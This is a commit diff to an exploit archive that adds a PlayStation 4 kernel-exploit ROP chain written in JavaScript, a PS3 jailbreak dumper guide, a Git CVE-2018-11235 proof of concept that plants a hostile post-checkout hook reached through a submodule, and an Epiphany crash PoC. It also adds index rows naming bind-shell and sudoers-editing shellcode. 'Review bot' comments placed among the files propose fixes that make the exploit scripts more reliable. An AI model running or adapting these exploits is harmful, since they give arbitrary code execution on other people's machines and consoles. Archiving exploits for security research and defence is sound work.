DB: 2018-06-02

5 changes to exploits/shellcodes

Epiphany 3.28.2.1 - Denial of Service
Sony Playstation 4 (PS4) 5.07 - 'Jailbreak' WebKit / 'bpf v2' Kernel Loader
Sony Playstation 4 (PS4) 5.1 - Kernel (PoC)
Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)

Git < 2.17.1 - Remote Code Execution

Wordpress Plugin Events Calendar - SQL Injection
WordPress Plugin Events Calendar - SQL Injection

Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)
Linux/x86 - Egghunter + Null-Free Shellcode (11 Bytes)
Linux/x86 - EggHunter + access() Shellcode (38 bytes)
Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)
Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes)
Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)
Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)
Linux/ARM - Egghunter (\x50\x90\x50\x90) + execve('/bin/sh') Shellcode (32 bytes)
This commit is contained in:
Offensive Security 2018-06-02 05:01:45 +00:00
parent 0f18636d14
commit 22ba7ab5f3
7 changed files with 637 additions and 5 deletions


@ -0,0 +1,34 @@
# PS4 5.05 Kernel Exploit
---
## Summary
In this project you will find a full implementation of the second "bpf" kernel exploit for the PlayStation 4 on 5.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This exploit also contains autolaunching code for Mira and Vortex's HEN payload. Subsequent loads will launch the usual payload launcher.
This bug was discovered by qwertyoruiopz, and can be found hosted on his website [here](http://crack.bargains/505k/). The [GitHub Pages site](https://cryptogenic.github.io/PS4-5.05-Kernel-Exploit/) automatically generated from this repository should also work.
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44818.zip
## Patches Included
The following patches are made by default in the kernel ROP chain:
1) Disable kernel write protection
2) Allow RWX (read-write-execute) memory mapping
3) Syscall instruction allowed anywhere
4) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
## Payloads included
1) Vortex's HEN (Homebrew Enabler)
2) Mira
## Notes
- The page will crash on successful kernel exploitation, this is normal
## Contributors
Massive credits to the following:
- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
- [Flatz](https://twitter.com/flat_z)
- [Vortex](https://github.com/xvortex)
- [OpenOrbis Team](https://github.com/OpenOrbis/)
- Anonymous


@ -0,0 +1,474 @@
log("--- trying kernel exploit --");
function malloc(sz)
{
var backing = new Uint8Array(0x10000+sz);
window.nogc.push(backing);
var ptr = p.read8(p.leakval(backing).add32(0x10));
ptr.backing = backing;
return ptr;
}
function malloc32(sz)
{
var backing = new Uint8Array(0x10000+sz*4);
window.nogc.push(backing);
var ptr = p.read8(p.leakval(backing).add32(0x10));
ptr.backing = new Uint32Array(backing.buffer);
return ptr;
}
var strcpy_helper = new Uint8Array(0x1000);
var where_writeptr_strcpy = p.leakval(strcpy_helper).add32(0x10);
function strcpy(ptr, str)
{
p.write8(where_writeptr_strcpy, ptr);
for (var i = 0; i < str.length; i++)
strcpy_helper[i] = str.charCodeAt(i) & 0xFF;
strcpy_helper[str.length] = 0;
}
var spawnthread = function(name, chain) {
/*
seg000:00000000007FA7D0 sub_7FA7D0 proc near ; DATA XREF: sub_7F8330+5Eo
seg000:00000000007FA7D0 55 push rbp
seg000:00000000007FA7D1 48 89 E5 mov rbp, rsp
seg000:00000000007FA7D4 41 56 push r14
seg000:00000000007FA7D6 53 push rbx
seg000:00000000007FA7D7 48 89 F3 mov rbx, rsi
seg000:00000000007FA7DA 49 89 FE mov r14, rdi
seg000:00000000007FA7DD 48 8D 35 E5 B3 EC 00 lea rsi, aMissingPlteBef ; "Missing PLTE before tRNS"
-> xref:
seg000:00000000007F8380 48 8D 3D 28 D8 EC 00 lea rdi, a1_5_18_0 ; "1.5.18"
seg000:00000000007F8387 48 8D 15 82 23 00 00 lea rdx, sub_7FA710
seg000:00000000007F838E 48 8D 0D 3B 24 00 00 lea rcx, sub_7FA7D0
seg000:00000000007F8395 31 F6 xor esi, esi
seg000:00000000007F8397 49 C7 47 20 00 00 00 00 mov qword ptr [r15+20h], 0
seg000:00000000007F839F 66 41 C7 47 18 00 00 mov word ptr [r15+18h], 0
seg000:00000000007F83A6 49 C7 47 10 00 00 00 00 mov qword ptr [r15+10h], 0
seg000:00000000007F83AE E8 8D 3C D3 00 call sub_152C040
-> code:
m_png = png_create_read_struct(PNG_LIBPNG_VER_STRING, 0, decodingFailed, decodingWarning);
decodingWarning -> contains Missing PLTE before tRNS
decodingFailed -> contains longjmp
seg000:00000000007FA710 sub_7FA710 proc near ; DATA XREF: sub_7F8330+57o
seg000:00000000007FA710 ; sub_7F9DC0+2Eo
seg000:00000000007FA710 55 push rbp
seg000:00000000007FA711 48 89 E5 mov rbp, rsp
seg000:00000000007FA714 48 8B 35 5D B6 E5 02 mov rsi, cs:qword_3655D78
seg000:00000000007FA71B BA 60 00 00 00 mov edx, 60h ; '`'
seg000:00000000007FA720 E8 AB E6 D2 00 call sub_1528DD0
seg000:00000000007FA725 BE 01 00 00 00 mov esi, 1
seg000:00000000007FA72A 48 89 C7 mov rdi, rax
seg000:00000000007FA72D E8 26 6D 80 FF call sub_1458 < longjmp
seg000:00000000007FA732 0F 0B ud2
seg000:00000000007FA732 sub_7FA710 endp
*/
var longjmp = window.webKitBase.add32(0x14e8);
// ThreadIdentifier createThread(ThreadFunction entryPoint, void* data, const char* name)
/*
seg000:00000000001DD17F 48 8D 15 C9 38 4C 01 lea rdx, aWebcoreGccontr ; "WebCore: GCController"
seg000:00000000001DD186 31 F6 xor esi, esi
seg000:00000000001DD188 E8 B3 1B F9 00 call sub_116ED40
*/
var createThread = window.webKitBase.add32(0x779190);
var contextp = malloc32(0x2000);
var contextz = contextp.backing;
contextz[0] = 1337;
var thread2 = new RopChain();
thread2.push(window.gadgets["ret"]); // nop
thread2.push(window.gadgets["ret"]); // nop
thread2.push(window.gadgets["ret"]); // nop
thread2.push(window.gadgets["ret"]); // nop
chain(thread2);
p.write8(contextp, window.gadgets["ret"]); // rip -> ret gadget
p.write8(contextp.add32(0x10), thread2.ropframeptr); // rsp
var retv = function() {p.fcall(createThread, longjmp, contextp, p.sptr(name));}
window.nogc.push(contextp);
window.nogc.push(thread2);
return retv;
}
var fd = p.syscall("open", p.sptr("/dev/bpf0"), 2).low;
var fd1 = p.syscall("open", p.sptr("/dev/bpf0"), 2).low;
if (fd == (-1 >>> 0))
{
print("kexp failed: no bpf0");
}
var assertcnt = 0;
var assert = function(x)
{
assertcnt++;
if (!x) throw "assertion " + assertcnt + " failed";
}
print("got it");
var bpf_valid = malloc32(0x4000);
var bpf_spray = malloc32(0x4000);
var bpf_valid_u32 = bpf_valid.backing;
var bpf_valid_prog = malloc(0x40);
p.write8(bpf_valid_prog, 0x800/8)
p.write8(bpf_valid_prog.add32(8), bpf_valid)
var bpf_spray_prog = malloc(0x40);
p.write8(bpf_spray_prog, 0x800/8)
p.write8(bpf_spray_prog.add32(8), bpf_spray)
for (var i = 0 ; i < 0x400; )
{
bpf_valid_u32[i++] = 6; // BPF_RET
bpf_valid_u32[i++] = 0;
}
var rtv = p.syscall("ioctl", fd, 0x8010427B, bpf_valid_prog);
assert(rtv.low == 0);
print("okay")
var interrupt1, loop1;
var interrupt2, loop2;
var sock = p.syscall(97, 2, 2)
var kscratch = malloc32(0x100);
var start1 = spawnthread("GottaGoFast", function(thread2){
interrupt1 = thread2.ropframeptr;
thread2.push(window.gadgets["ret"]); // pop rdx
thread2.push(window.gadgets["ret"]); // pop rdx
thread2.push(window.gadgets["ret"]); // pop rdx
thread2.push(window.gadgets["pop rdi"]); // pop rdi
thread2.push(fd); // what
thread2.push(window.gadgets["pop rsi"]); // pop rsi
thread2.push(0x8010427B); // what
thread2.push(window.gadgets["pop rdx"]); // pop rdx
thread2.push(bpf_valid_prog); // what
thread2.push(window.gadgets["pop rsp"]); // pop rdx
thread2.push(thread2.ropframeptr.add32(0x800)); // what
thread2.count = 0x100;
var cntr = thread2.count;
thread2.push(window.syscalls[54]); // ioctl
thread2.push_write8(thread2.ropframeptr.add32(cntr*8), window.syscalls[54]); // restore ioctl
thread2.push(window.gadgets["pop rdi"]); // pop rdi
var wherep = thread2.pushSymbolic(); // where
thread2.push(window.gadgets["pop rsi"]); // pop rsi
var whatp = thread2.pushSymbolic(); // where
thread2.push(window.gadgets["mov [rdi], rsi"]); // perform write
thread2.push(window.gadgets["pop rsp"]); // pop rdx
loop1 = thread2.ropframeptr.add32(thread2.count*8);
thread2.push(0x41414141); // what
thread2.finalizeSymbolic(wherep, loop1);
thread2.finalizeSymbolic(whatp, loop1.sub32(8));
})
var krop = new RopChain();
var race = new RopChain();
var ctxp = malloc32(0x2000);
var ctxp1 = malloc32(0x2000);
p.write8(bpf_spray.add32(16), ctxp);
var prefaultlist = [];
function pfd(addr)
{
var page = addr.add32(0);
page.low &= 0xffffc000;
p.syscall("mlock", page, 0x8000);
p.read4(addr);
return addr;
}
function pf(addr){
var page = addr.add32(0);
page.low &= 0xffffc000;
p.syscall("mlock", page, 0x8000);
var ret = addr.add32(0);
while (1)
{
var opcode = (p.read4(ret) & 0xff);
if (opcode == 0xc3)
{
prefaultlist.push(ret);
break;
}
ret.add32inplace(1);
}
return addr;
}
for (var gadgetname in gadgets) {
if (gadgets.hasOwnProperty(gadgetname)) {
if (gadgetname == "stack_chk_fail" || gadgetname == "memset" || gadgetname == "setjmp") continue;
pf(gadgets[gadgetname]);
}
}
/*
67d27: 48 8b 07 mov (%rdi),%rax
67d2a: ff 50 58 callq *0x58(%rax)
12a184d: 48 83 ec 58 sub $0x58,%rsp
12a1851: 89 55 d4 mov %edx,-0x2c(%rbp)
12a1854: 49 89 fd mov %rdi,%r13
12a1857: 49 89 f7 mov %rsi,%r15
12a185a: 49 8b 45 00 mov 0x0(%r13),%rax
12a185e: ff 90 d0 07 00 00 callq *0x7d0(%rax)
6ef2e5: 48 8b 7f 10 mov 0x10(%rdi),%rdi
6ef2e9: ff 20 jmpq *(%rax)
2728a1: 48 8d 7d d8 lea -0x28(%rbp),%rdi
2728a5: ff 50 40 callq *0x40(%rax)
12846b4: 48 8b 77 08 mov 0x8(%rdi),%rsi
12846b8: 48 8b 7f 18 mov 0x18(%rdi),%rdi
12846bc: 48 8b 07 mov (%rdi),%rax
12846bf: ff 50 30 callq *0x30(%rax)
15ca29b: 48 8b 97 b0 00 00 00 mov 0xb0(%rdi),%rdx
15ca2a2: ff 57 70 callq *0x70(%rdi)
f094a: 48 89 e5 mov %rsp,%rbp
f094d: 48 8b 07 mov (%rdi),%rax
f0950: ff 90 20 04 00 00 callq *0x420(%rax)
*/
var ctxp2 = malloc32(0x2000);
var wk2apf = function(off)
{
var addr = window.webKitBase.add32(off);
pf(addr);
return addr;
}
p.write8(ctxp.add32(0x50), 0);
p.write8(ctxp.add32(0x68), ctxp1);
var stackshift_from_retaddr = 0;
p.write8(ctxp1.add32(0x10), wk2apf(0x12a184d));
stackshift_from_retaddr += 8 + 0x58; // call + sub
p.write8(ctxp.add32(0), ctxp2);
p.write8(ctxp.add32(0x10), ctxp2.add32(8));
p.write8(ctxp2.add32(0x7d0), wk2apf(0x6ef2e5))
// rax = ctxp2, rdi = ctxp2 + 8
var iterbase = ctxp2;
for (var i=0; i<0xf; i++)
{
p.write8(iterbase, wk2apf(0x12a184d))
stackshift_from_retaddr += 8 + 0x58; // call + sub
// rax = ctxp2+0x20
p.write8(iterbase.add32(0x7d0+0x20), wk2apf(0x6ef2e5))
p.write8(iterbase.add32(8), iterbase.add32(0x20));
p.write8(iterbase.add32(0x18), iterbase.add32(0x20+8))
iterbase = iterbase.add32(0x20);
}
var raxbase = iterbase;
var rdibase = iterbase.add32(8);
var memcpy = get_jmptgt(webKitBase.add32(0xf8));
memcpy = p.read8(memcpy);
pf(memcpy);
p.write8(raxbase, wk2apf(0x15ca29b))
stackshift_from_retaddr += 8; // call + sub
p.write8(rdibase.add32(0x70), wk2apf(0x12846b4)); // next gadget
stackshift_from_retaddr += 8; // call + sub
p.write8(rdibase.add32(0x18), rdibase); // rdi
p.write8(rdibase.add32(8), krop.ropframeptr); // rax
p.write8(raxbase.add32(0x30), wk2apf(0xf094a)); // next gadget
p.write8(rdibase, raxbase);
p.write8(raxbase.add32(0x420), wk2apf(0x2728a1)); // next gadget
p.write8(raxbase.add32(0x40), memcpy.add32(0xc2-0x90)); // next gadget (memcpy skipping prolog)
var topofchain = stackshift_from_retaddr + 0x28 ;
p.write8(rdibase.add32(0xb0), topofchain); // rdx
for (var i = 0; i < 0x1000/8; i++)
{
p.write8(krop.ropframeptr.add32(i*8), window.gadgets["ret"]);
}
krop.count = 0x10;
/*
f094a: 48 89 e5 mov %rsp,%rbp
f094d: 48 8b 07 mov (%rdi),%rax
f0950: ff 90 20 04 00 00 callq *0x420(%rax)
2728a1: 48 8d 7d d8 lea -0x28(%rbp),%rdi
2728a5: ff 50 40 callq *0x40(%rax)
55566f: 48 01 c7 add %rax,%rdi
555672: 48 89 f8 mov %rdi,%rax
555675: c3 retq
46ef9: 48 8b 07 mov (%rdi),%rax
46efc: c3 retq
1520c6: 48 01 f0 add %rsi,%rax
1520c9: c3 retq
14536b: 48 89 07 mov %rax,(%rdi)
14536e: c3 retq
1570a1f: 48 21 f0 and %rsi,%rax
1570a22: c3 retq
353a71: 48 89 c2 mov %rax,%rdx
353a74: c3 retq
1cee60: 48 89 d0 mov %rdx,%rax
1cee63: c3 retq
15a3faf: 48 89 c7 mov %rax,%rdi
15a3fb2: c3 retq
6c83a: 48 8b 00 mov (%rax),%rax
6c83d: c3 retq
295dbe: ff e7 jmpq *%rdi
*/
p.write8(kscratch.add32(0x420), window.gadgets["pop rdi"]);
p.write8(kscratch.add32(0x40), window.gadgets["pop rax"]);
p.write8(kscratch.add32(0x18), kscratch);
function set_rdi_rbpoff() {
krop.push(window.gadgets["pop rdi"]); // pop rdi
krop.push(kscratch.add32(0x18)); // what
krop.push(wk2apf(0xf094a)); // rbp = rsp
var rbp_off = topofchain - krop.count*8 + 0x28;
krop.push(wk2apf(0x2728a1)); // rbp = rsp
return rbp_off;
}
function add_to_rdi(imm)
{
krop.push(window.gadgets["pop rax"]); // pop rdi
krop.push(imm); // what
krop.push(wk2apf(0x55566f)); // rbp = rsp
}
var rboff = set_rdi_rbpoff();
add_to_rdi(rboff);
var add_rax = function(imm)
{
krop.push(window.gadgets["pop rsi"]); // pop rsi
krop.push(imm); // what
krop.push(wk2apf(0x1520c6)); // add rsi to rax
}
krop.push(wk2apf(0x46ef9)); // deref rdi in rax
add_rax(0x2fa); // what
krop.push(wk2apf(0x14536b)); // write rax to rdi
var shellbuf = malloc32(0x1000);
var write_rax = function(addr)
{
krop.push(window.gadgets["pop rdi"]); // pop rdi
krop.push(addr); // what
krop.push(wk2apf(0x14536b)); // write rax to rdi
}
var load_rax = function(addr)
{
krop.push(window.gadgets["pop rax"]); // pop rax
krop.push(addr); // what
krop.push(wk2apf(0x6c83a)); // deref rax
}
var and_rax = function(imm)
{
krop.push(window.gadgets["pop rsi"]); // pop rdi
krop.push(imm); // what
krop.push(wk2apf(0x1570a1f)); // and rax to rdi
}
var rax_to_rdx = function()
{
krop.push(wk2apf(0x353a71)); // rax to rdx
}
var rdx_to_rax = function()
{
krop.push(wk2apf(0x1cee60)); // rdx to rax
}
var rax_to_rdi = function()
{
krop.push(wk2apf(0x15a3faf)); // rax to rdi
}
var write_to_rax64 = function(imm)
{
krop.push(window.gadgets["pop rsi"]); // pop rdi
krop.push(imm); // what
krop.push(window.gadgets["mov [rax], rsi"]); // pop rdi
}
write_rax(kscratch); // save address in usermode
add_rax(0xc54b4)
write_rax(kscratch.add32(8)); // save address
krop.push(wk2apf(0x82)); // jmp rax
write_rax(kscratch.add32(16)); // save cr0
and_rax(new int64(0xfffeffff,0xffffffff)); // unset bit
rax_to_rdx();
load_rax(kscratch.add32(8))
add_rax(9)
rax_to_rdi();
rdx_to_rax();
krop.push(wk2apf(0x295dbe)); // jmp rdi
/*
Write Anywhere mode
*/
load_rax(kscratch);
add_rax(0x3609a);
krop.push(wk2apf(0x6c83a)); // deref rax
write_rax(kscratch.add32(0x330)); // rando offset lol
// put patches here. example is mprotect patch
load_rax(kscratch);
add_rax(0x3609a);
write_to_rax64(new int64(0x9090FA38,0x90909090)); // patch mprotect
/*
Disable Write Anywhere mode
*/
load_rax(kscratch.add32(8))
add_rax(9)
rax_to_rdi();
load_rax(kscratch.add32(16))
krop.push(wk2apf(0x295dbe)); // jmp rdi
krop.push(wk2apf(0x5cdb9));
krop.push(kscratch.add32(0x1000));
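Review bot: The open() failure check at `if (fd == (-1 >>> 0))` only prints and then falls through, so the ioctl at `p.syscall("ioctl", fd, 0x8010427B, bpf_valid_prog)` and the later ROP setup run with an invalid descriptor, and the second descriptor `fd1` is never checked at all; the guard should abort instead, e.g. `if (fd == (-1 >>> 0) || fd1 == (-1 >>> 0)) throw new Error("kexp failed: no bpf0");`. The local `assert` helper throws a bare string, which carries no stack trace and fails any `instanceof Error` check in a caller's catch; `if (!x) throw new Error("assertion " + assertcnt + " failed");` keeps the same message. The script also alternates between `log(...)` and `print(...)` for status output with no evident distinction, and several statements (`p.write8(bpf_valid_prog, 0x800/8)`, `var sock = p.syscall(97, 2, 2)`, `add_rax(0xc54b4)`) rely on semicolon insertion while neighbouring lines do not. The hunk header announces 474 added lines but the rendered section shows fewer, so the chain presumably continues past `krop.push(kscratch.add32(0x1000));` and the visible end is not the end of the file.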


@ -0,0 +1,23 @@
EDB Note ~ http://ps3xploit.com/help/dumper.html
EDB Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44820.zip
## Dumper Help
**Warning**:
Due to the lack of proper checks after exiting the ROP chain, it is possible in some cases to obtain a success message despite an operation failure. For instance, if you choose a path where no device is plugged in, a dumper page will still display a success message despite the fact the dump save could not work. This limitation has already been addressed, the added operation checks will be part of an update to these PS3Xploit tools which will be released in the coming weeks, that update will be final, no more will come after it.
## PLEASE READ FIRST:
- For best results with the flash dumper, here are the recommended steps.
- Open the browser & browse to the ps3xploit.com website, go to the page of the exploit you need. Set the current page as browser homepage. Don't launch the exploit initialization. Close the browser.
- Open the browser. The exploit page will load automatically. Choose your dump path option or download the dump.jpg file if you use the hdd edition.
- Press the exploit initialization button & wait until initialization succeeds. If it fails, follow the refresh/reload instructions on screen.
- Trigger the exploit.
- On success, check your dump with the py checker tool.
## Usage Tips:
- Try using a LAN connection or a solid WiFi connection during exploitation. A weak signal can cause problems.
- If the exploit takes more than 5 minutes to work, reload page, browser, or restart console and try again.
- If you are using a LAN connection and experience network issues, make sure all cables to router are in working order.


@ -0,0 +1,54 @@
# Exploit Title: Git (code execution)
# Date: 2018-05-29
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: https://github.com/git/git <https://github.com/git/git>
# CVE: CVE-2018-11235
#Version: <=2.17.1
# Tested on Kali Linux
P0C:
Create two files:
pwned.sh: the file which will contain our commands to be executed
commit.sh the fole which contain a normal build with a bit of calls to our pwned.sh file
add the follwing to Pwned.sh:
#!/bin/sh
cat << EOF
#here we can put our lovely commands
Exploited! : $(ifconfig)
EOF
#--------
Add the follwing to commit.sh file:
#!/bin/sh
set -e
repo_dir="$PWD/repo"
#change it to any other Repo
repo_submodule='https://github.com/JameelNabbo/SmartWorm'
git init "$repo_dir"
cd "$repo_dir"
git submodule add "$repo_submodule" pwned
mkdir modules
cp -r .git/modules/pwned modules
cp ../pwned.sh modules/pwned/hooks/post-checkout
git config -f .gitmodules submodule.pwned.update checkout
git config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned
git add modules
git submodule add "$repo_submodule"
git add SmartWorm
git commit -am pwned
echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`”
——————
Solution:
https://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html
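Review bot: The closing quote on the last line of commit.sh, `echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`”`, is a Unicode right double quotation mark (U+201D) rather than ASCII `"`, so the shell sees an unterminated string and the script fails at parse time; the line should end with a plain `"`. The version bound in the header, `#Version: <=2.17.1`, contradicts the entry title used elsewhere in this commit, "Git < 2.17.1 - Remote Code Execution", which treats 2.17.1 as the fixed release; the two should agree. The prose has typos that will survive into the archive ("fole", "follwing", "Pwned.sh" versus "pwned.sh"), and the em-dash line after the script reads as part of it. The Solution section would be more useful with one sentence stating the mitigation directly — upgrade to a fixed release and treat `--recurse-submodules` on untrusted repositories as executing their hooks — rather than only linking a blog post.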


@ -0,0 +1,42 @@
Summary:
ephy-session.c in libephymain.so in GNOME Web (aka Epiphany) through 3.28.2.1 allows remote attackers to cause a denial of service (application crash) via JavaScript code that triggers access to a NULL URL, as demonstrated by a crafted window.open call, CVE-2018-11396 was assigned to this issue.
PoC:
<script>
win = window.open("hello world");
</script>
Stack trace:
ftw@ftw-box:~$ gdb epiphany
(gdb) run
Starting program: /usr/bin/epiphany
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7fffe08bc700 (LWP 2279)]
[New Thread 0x7fffdee51700 (LWP 2280)]
[New Thread 0x7fffde650700 (LWP 2281)]
[New Thread 0x7fffdcdd5700 (LWP 2282)]
[New Thread 0x7fffd7fff700 (LWP 2283)]
[New Thread 0x7fffd77fe700 (LWP 2284)]
[New Thread 0x7fffd6ffd700 (LWP 2285)]
[New Thread 0x7fffd67fc700 (LWP 2286)]
[New Thread 0x7fffd5b8c700 (LWP 2287)]
[New Thread 0x7fffd538b700 (LWP 2288)]
[New Thread 0x7fff8f486700 (LWP 2294)]
[New Thread 0x7fff8da1e700 (LWP 2304)]
[New Thread 0x7fff8d21d700 (LWP 2305)]
[New Thread 0x7fff8ea7f700 (LWP 2315)]
[Thread 0x7fffd5b8c700 (LWP 2287) exited]
[Thread 0x7fffd67fc700 (LWP 2286) exited]
Thread 15 "pool" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fff8ea7f700 (LWP 2315)]
0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
(gdb) bt
#0 0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#1 0x00007ffff7079be6 in ?? () from /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#2 0x00007ffff73fe7d0 in ?? () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#3 0x00007ffff73fde05 in ?? () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#4 0x00007fffefc246db in start_thread (arg=0x7fff8ea7f700) at pthread_create.c:463
#5 0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
(gdb)
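Review bot: The backtrace is unsymbolized — every frame in libephymain.so, libgio and libglib shows as `?? ()` — so the summary's attribution of the crash to `ephy-session.c` cannot be checked from the report itself; re-capturing the trace with the Epiphany and GLib debug-symbol packages installed, or adding one line saying how the ephy-session.c location was established, would make the claim verifiable. The summary sentence also runs two statements together with a comma ("... window.open call, CVE-2018-11396 was assigned to this issue"); splitting it into two sentences reads better. No fixed version or mitigation is stated; since the report names 3.28.2.1 as the last affected release, a line naming the fixed upstream release once it is known would close the loop for readers triaging this.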


@ -5985,6 +5985,7 @@ id,file,description,date,author,type,platform,port
44768,exploits/php/dos/44768.txt,"Symfony 2.7.0 < 4.0.10 - Denial of Service",2018-05-26,"Federico Stange",dos,php,
44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows,
44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9751,6 +9752,9 @@ id,file,description,date,author,type,platform,port
44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux,
44798,exploits/linux/local/44798.txt,"GNU Barcode 0.99 - Memory Leak",2018-05-29,LiquidWorm,local,linux,
44806,exploits/linux/local/44806.txt,"Procps-ng - Multiple Vulnerabilities",2018-05-30,"Qualys Corporation",local,linux,
44818,exploits/hardware/local/44818.md,"Sony Playstation 4 (PS4) 5.07 - 'Jailbreak' WebKit / 'bpf v2' Kernel Loader",2018-05-28,Specter,local,hardware,
44819,exploits/hardware/local/44819.js,"Sony Playstation 4 (PS4) 5.1 - Kernel (PoC)",2018-05-28,qwertyoruiop,local,hardware,
44820,exploits/hardware/local/44820.txt,"Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)",2018-01-28,PS3Xploit,local,hardware,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16535,6 +16539,7 @@ id,file,description,date,author,type,platform,port
44760,exploits/hardware/remote/44760.rb,"D-Link DSL-2750B - OS Command Injection (Metasploit)",2018-05-25,Metasploit,remote,hardware,
44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware,
44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,
44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39461,7 +39466,7 @@ id,file,description,date,author,type,platform,port
44781,exploits/hardware/webapps/44781.txt,"TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass",2018-05-28,"BlackFog Team",webapps,hardware,
44782,exploits/php/webapps/44782.txt,"DomainMod 4.09.03 - 'oid' Cross-Site Scripting",2018-05-28,longer,webapps,php,
44783,exploits/php/webapps/44783.txt,"DomainMod 4.09.03 - 'sslpaid' Cross-Site Scripting",2018-05-28,longer,webapps,php,
44785,exploits/php/webapps/44785.txt,"Wordpress Plugin Events Calendar - SQL Injection",2018-05-28,AkkuS,webapps,php,
44785,exploits/php/webapps/44785.txt,"WordPress Plugin Events Calendar - SQL Injection",2018-05-28,AkkuS,webapps,php,
44786,exploits/php/webapps/44786.txt,"Joomla! Component Full Social 1.1.0 - 'search_query' SQL Injection",2018-05-28,L0RD,webapps,php,
44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,



@ -872,7 +872,7 @@ id,file,description,date,author,type,platform
42992,shellcodes/windows_x86-64/42992.c,"Windows/x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86
44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86
44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86
44334,shellcodes/linux_x86/44334.c,"Linux/x86 - Egghunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86
44445,shellcodes/generator/44445.py,"Linux/x64 - x64 Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator
44505,shellcodes/linux_x86/44505.c,"Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
44507,shellcodes/linux_x86/44507.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access + Null-Free Shellcode (79 bytes)",2018-04-24,absolomb,shellcode,linux_x86
